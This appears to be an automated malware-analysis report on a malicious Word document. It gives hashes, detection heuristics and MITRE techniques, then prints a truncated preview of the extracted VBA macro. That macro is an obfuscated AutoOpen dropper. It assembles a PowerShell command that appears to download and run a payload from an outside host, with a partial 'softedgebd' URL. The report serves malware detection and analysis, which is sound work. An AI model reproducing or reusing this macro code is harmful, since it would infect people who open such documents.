Office (OLE) malware analysis — malicious · f58b4c8562b2d9bf

MALICIOUS

Office (OLE)

113.5 KB Created: 2018-02-08 18:02:00 Authoring application: Microsoft Office Word First seen: 2018-02-19

MD5: c0fa3d4bc668cc670fd40d4ff5c15083 SHA-1: 380ad19e0069d7d013c1fd93682fe67ae19d91b9 SHA-256: f58b4c8562b2d9bf2cefba2a58405bdab30581167be13231248450616a5740d1

242 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1204.002 Malicious File

The sample is a malicious Office document containing a VBA macro with an AutoOpen function. This macro utilizes the Shell() function, a critical heuristic firing, indicating an attempt to execute arbitrary commands. The ClamAV signature 'Img.Dropper.PhishingLure-6443153-0' further supports its malicious nature as a dropper or phishing lure.

Heuristics 7

ClamAV: Img.Dropper.PhishingLure-6443153-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Img.Dropper.PhishingLure-6443153-0
VBA macros detected medium 3 related findings OLE_VBA_MACROS

Document contains VBA macro code
Shell() call in VBA critical OLE_VBA_SHELL

Shell() call in VBA
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 27941 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	27941 bytes
SHA-256: `d9658e6f61c6ddc8e424e13de49e1cc03a2259f19177daa0b474c0ef46fa96d6`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Attribute VB_Name = "zDUisfXAdkUiH" Sub AutoOpen() On Error Resume Next IRmBDTSPh = lBYtqjcthNdB - dIQcpZzu / (4644919 + CZwbCpIQtmmI - 2290006 + iuCTsKTmGJIs) mqcqinNOW = uEaDZzkPV - wdwuWfBNSQ / (3659786 + TJDRnDDzvzQK - 49295 + tplWBronwJrhTC) lAvGAIkRA = JhLVZzNn - YmMcwObwfMuaFj / (184055 + vBKKsNcod - 2464181 + jSOzwDnvQY) Application.Run "mJObojGIbmVpH", rSibktPwwcdbq XzsZKFEGh = zKHiwCd - LJYwjtu / (6063005 + PwWSnkpXB - 3517055 + iHXivIWWKkzt) akjGAYPwi = opILlKaSGwk - UDmpCaWYUjQEv / (6459764 + dpwlTGD - 3645485 + akXMwsdCIiQf) End Sub Function rSibktPwwcdbq() On Error Resume Next tsUjQHVbV = WmVIrVdzHwztN - ZXznHBqB / (9229275 + ZvwMfFzaN - 8804668 + izdMvZOH) jVAwzJKlWaa = jDmYdzqEj - BUqCivY / (3200892 + CzZfTzvZW - 5160082 + bctilWJY) KYppj = hPuqIsrouuRW - wFOHXSbi / (4668610 + iXdZbHRMmA - 6550412 + mEjXbGHibJpS) fSVOPXp = iDUpsrG + Mid(("TBdMSzEaVptbLtcTchoXziEvASraRQnjaFDddgu,dgu9irdgu)) ') -rEPlAcGnIa"), 35, 28) npEYP = SPjdhfWaMSJ - ArVbusUhLt / (7632426 + nOvCibrnQsIq - 5038091 + tiSrTVL) EUBwfFWQFAT = zzcYPDv - TZcuqTjUslbW / (1492773 + iiBtwqPT - 5088763 + bhQwaJLor) HaELhlSzJ = YjOfKZuwziu - zpQzXVFFVAwJT / (1625104 + ntjZmib - 6844437 + QViYvQTsYmjafd) qmlGt = nUdwqzzJvQS + Mid(("XjajLaCe([Char]54+[paj+pdg'+'u+dguajChar]98+[Chdgu+dguar]50),[YiaTPlNAACYNVSGK"), 3, 60) VIopcd = IHLVFQjBn - JFjGlhYcHQwj / (715667 + RLOMJjBoLDjRb - 2680961 + OwkCCdEqiT) rWmRl = dtzpTZDTEuC - rGfUudWTGK / (1522376 + TMjBNMUksfDIo - 4224094 + KNHJaMcswXIK) zLSRRn = HzYSlHVGs - FrZRbMC / (4402597 + YsMGwAhfrTk - 5841536 + CHdtGkW) CfvBOHozocj = pjmKXkELCWHF + Mid(("uKSLhAoj+pajb2+6kpaj+pajf'+'u+kfudgu+dgubkfu+kfu2kfu+kfuw6kfu+kfub2+kfu+kfu6bk'+'fu+kfu2kfu+kfu-kfu+kfuob'+'kfpaj+pajimohiBCWLqGCh"), 8, 110) OMSzlwRCjn = mUutZREbdnH - AoSniFSAwX / (2959176 + uzijkrnqicQmjz - 6367019 + SGWpKoAdi) oAKIAjB = RabziOFA - cjYqmARtYYjEiY / (9879097 + rAZkGwEzcZNO - 5835291 + BjjAEitPkptucF) cZvIXOrlv = DiBcRnN - QsjfaNNmCPb / (4330432 + ViUQobQjqLTwuZ - 8144580 + mMKoATHY) oBwtIYvK = AdSLBSBvAjtA + Mid(("IKYIzdwb (('& ((gV dguMDrdgu).NAMe[3,11,2]-J'+'oINdgudgu)( (dgu (paj&dgu+dgu( (paj+paj[STriNG]zO7veRboSEPrEFeReNc'+'E)[1,3]+kfuxkfu-Joinkfukfu)(((paj+pajdgu+dgukfugkpaj+pajfu+kfupaj+pajJ'+'Ankfu+'PzGm"), 9, 190) qTXYEMf = DhAhLcLwwZhM - joXaPCRiwCav / (2557347 + ZujzjSPrrp - 5957224 + kwrEtaLWmNz) KfDuFLzi = adkBEfalwHl - PZAuRoz / (6429938 + pRSqtIzjriMuEZ - 539928 + OmMPtbdMppUZ) kklmPikzDO = EzQSflLRK - WbBHYZHK / (53378 + LDCkSCNoGAEoZR - 7474921 + wcZnrQDbposU) wKhPWBF = SBWCqfB + Mid(("iIPpkwWrdKg][ChA'+'R]36).RePLAcE(pajkfupaj,[STRIng][ChAR]39)qDd dgu+dgu&( '+'GJkpSHOME[21]+GJkPSHOmE[30]+pajxpaj)dgu).rEplacE(dguG'+'Jkdgu,dguTibdgu).rEplacE(dgupajdgu,[st'+'rINg][cHar]39isw"), 11, 177) zIfZvjnar = fzdXWLKGiBjUnd - lMGvzbviJtk / (3697271 + aTwMlpRcv - 3029242 + FtVGmIARJC) aaVRu = HUKBUjVTimrrf - DXiwMDqwl / (7993662 + GprBsSJQ - 6372160 + dBkVhGbk) QMOcDMHX = NBprjlRTzzDK - VuNtiSlTibwC / (5022185 + wciwOMDbFQ - 9644140 + PbzLRiBu) IjJriEG = nhiUbFB + Mid(("osd.next(1dgu+dgu00'+'00,kfu+kfu 2kfu+kfu82kfu+kfu13kfu+kfu3);gkfu+kfuJAkfu+kfuADCXpaj+paj kfu+kfu= 6kfu+kfdgu+dguub2 htkfu+kfutp://sokfu+kfuftedkf'+'u+kfugebkfu+kfudgu'+'+dgud. WktjvIdJdlsYVrKhiqdlwn"), 2, 176) SzwttcBD = PTqTCowf - pzvWCKUXKUBfq / (1630830 + qTFNpwfaJw - 172365 + JsOpCPmA) UodUVJbNfi = rGGouHPW - dYKUcijlpwJXm / (4505515 + BKiwfwQ - 666069 + LzNwYuoQ) JvNEbAUPwHO = WVczpPf - RZqqnFj / (944763 + kcSqpMVCIdVk - 2529131 + HsSQCZDUPQYjrN) YiAVVOfdnlv = pHncJwOfZqo + Mid(("lRIPwBHDRqDhamOZPJiu+kfujekfu+kdgu+dgufuct6kfu+'+'kfubkfu+kfu2)dgu+dgu k'+'fu+kfuSyskfu'+'+kfutemkfu+kf'+'Swl"), 20, 87) KBWHdf = IGvjmKVEiizU - jfiPNBSIVIljj / (8280874 + bjvvFjuSIncGD - 5493325 + iTEEzOCv) YldiDcfWGwp = wvYmwJwCSfcunC - GmMablvPf / (1760164 + SfftbY ... (truncated)

SHA-256: d9658e6f61c6ddc8e424e13de49e1cc03a2259f19177daa0b474c0ef46fa96d6

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "zDUisfXAdkUiH"
Sub AutoOpen()
On Error Resume Next
IRmBDTSPh = lBYtqjcthNdB - dIQcpZzu / (4644919 + CZwbCpIQtmmI - 2290006 + iuCTsKTmGJIs)
mqcqinNOW = uEaDZzkPV - wdwuWfBNSQ / (3659786 + TJDRnDDzvzQK - 49295 + tplWBronwJrhTC)
lAvGAIkRA = JhLVZzNn - YmMcwObwfMuaFj / (184055 + vBKKsNcod - 2464181 + jSOzwDnvQY)
Application.Run "mJObojGIbmVpH", rSibktPwwcdbq
XzsZKFEGh = zKHiwCd - LJYwjtu / (6063005 + PwWSnkpXB - 3517055 + iHXivIWWKkzt)
akjGAYPwi = opILlKaSGwk - UDmpCaWYUjQEv / (6459764 + dpwlTGD - 3645485 + akXMwsdCIiQf)
End Sub
Function rSibktPwwcdbq()
On Error Resume Next
tsUjQHVbV = WmVIrVdzHwztN - ZXznHBqB / (9229275 + ZvwMfFzaN - 8804668 + izdMvZOH)
jVAwzJKlWaa = jDmYdzqEj - BUqCivY / (3200892 + CzZfTzvZW - 5160082 + bctilWJY)
KYppj = hPuqIsrouuRW - wFOHXSbi / (4668610 + iXdZbHRMmA - 6550412 + mEjXbGHibJpS)
fSVOPXp = iDUpsrG + Mid(("TBdMSzEaVptbLtcTchoXziEvASraRQnjaFDddgu,dgu9irdgu)) ') -rEPlAcGnIa"), 35, 28)
npEYP = SPjdhfWaMSJ - ArVbusUhLt / (7632426 + nOvCibrnQsIq - 5038091 + tiSrTVL)
EUBwfFWQFAT = zzcYPDv - TZcuqTjUslbW / (1492773 + iiBtwqPT - 5088763 + bhQwaJLor)
HaELhlSzJ = YjOfKZuwziu - zpQzXVFFVAwJT / (1625104 + ntjZmib - 6844437 + QViYvQTsYmjafd)
qmlGt = nUdwqzzJvQS + Mid(("XjajLaCe([Char]54+[paj+pdg'+'u+dguajChar]98+[Chdgu+dguar]50),[YiaTPlNAACYNVSGK"), 3, 60)
VIopcd = IHLVFQjBn - JFjGlhYcHQwj / (715667 + RLOMJjBoLDjRb - 2680961 + OwkCCdEqiT)
rWmRl = dtzpTZDTEuC - rGfUudWTGK / (1522376 + TMjBNMUksfDIo - 4224094 + KNHJaMcswXIK)
zLSRRn = HzYSlHVGs - FrZRbMC / (4402597 + YsMGwAhfrTk - 5841536 + CHdtGkW)
CfvBOHozocj = pjmKXkELCWHF + Mid(("uKSLhAoj+pajb2+6kpaj+pajf'+'u+kfudgu+dgubkfu+kfu2kfu+kfuw6kfu+kfub2+kfu+kfu6bk'+'fu+kfu2kfu+kfu-kfu+kfuob'+'kfpaj+pajimohiBCWLqGCh"), 8, 110)
OMSzlwRCjn = mUutZREbdnH - AoSniFSAwX / (2959176 + uzijkrnqicQmjz - 6367019 + SGWpKoAdi)
oAKIAjB = RabziOFA - cjYqmARtYYjEiY / (9879097 + rAZkGwEzcZNO - 5835291 + BjjAEitPkptucF)
cZvIXOrlv = DiBcRnN - QsjfaNNmCPb / (4330432 + ViUQobQjqLTwuZ - 8144580 + mMKoATHY)
oBwtIYvK = AdSLBSBvAjtA + Mid(("IKYIzdwb (('& ((gV dgu*MDr*dgu).NAMe[3,11,2]-J'+'oINdgudgu)( (dgu (paj&dgu+dgu( (paj+paj[STriNG]zO7veRboSEPrEFeReNc'+'E)[1,3]+kfuxkfu-Joinkfukfu)(((paj+pajdgu+dgukfugkpaj+pajfu+kfupaj+pajJ'+'Ankfu+'PzGm"), 9, 190)
qTXYEMf = DhAhLcLwwZhM - joXaPCRiwCav / (2557347 + ZujzjSPrrp - 5957224 + kwrEtaLWmNz)
KfDuFLzi = adkBEfalwHl - PZAuRoz / (6429938 + pRSqtIzjriMuEZ - 539928 + OmMPtbdMppUZ)
kklmPikzDO = EzQSflLRK - WbBHYZHK / (53378 + LDCkSCNoGAEoZR - 7474921 + wcZnrQDbposU)
wKhPWBF = SBWCqfB + Mid(("iIPpkwWrdKg][ChA'+'R]36).RePLAcE(pajkfupaj,[STRIng][ChAR]39)qDd dgu+dgu&( '+'GJkpSHOME[21]+GJkPSHOmE[30]+pajxpaj)dgu).rEplacE(dguG'+'Jkdgu,dguTibdgu).rEplacE(dgupajdgu,[st'+'rINg][cHar]39isw"), 11, 177)
zIfZvjnar = fzdXWLKGiBjUnd - lMGvzbviJtk / (3697271 + aTwMlpRcv - 3029242 + FtVGmIARJC)
aaVRu = HUKBUjVTimrrf - DXiwMDqwl / (7993662 + GprBsSJQ - 6372160 + dBkVhGbk)
QMOcDMHX = NBprjlRTzzDK - VuNtiSlTibwC / (5022185 + wciwOMDbFQ - 9644140 + PbzLRiBu)
IjJriEG = nhiUbFB + Mid(("osd.next(1dgu+dgu00'+'00,kfu+kfu 2kfu+kfu82kfu+kfu13kfu+kfu3);gkfu+kfuJAkfu+kfuADCXpaj+paj kfu+kfu= 6kfu+kfdgu+dguub2 htkfu+kfutp://sokfu+kfuftedkf'+'u+kfugebkfu+kfudgu'+'+dgud. WktjvIdJdlsYVrKhiqdlwn"), 2, 176)
SzwttcBD = PTqTCowf - pzvWCKUXKUBfq / (1630830 + qTFNpwfaJw - 172365 + JsOpCPmA)
UodUVJbNfi = rGGouHPW - dYKUcijlpwJXm / (4505515 + BKiwfwQ - 666069 + LzNwYuoQ)
JvNEbAUPwHO = WVczpPf - RZqqnFj / (944763 + kcSqpMVCIdVk - 2529131 + HsSQCZDUPQYjrN)
YiAVVOfdnlv = pHncJwOfZqo + Mid(("lRIPwBHDRqDhamOZPJiu+kfujekfu+kdgu+dgufuct6kfu+'+'kfubkfu+kfu2)dgu+dgu k'+'fu+kfuSyskfu'+'+kfutemkfu+kf'+'Swl"), 20, 87)
KBWHdf = IGvjmKVEiizU - jfiPNBSIVIljj / (8280874 + bjvvFjuSIncGD - 5493325 + iTEEzOCv)
YldiDcfWGwp = wvYmwJwCSfcunC - GmMablvPf / (1760164 + SfftbY
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.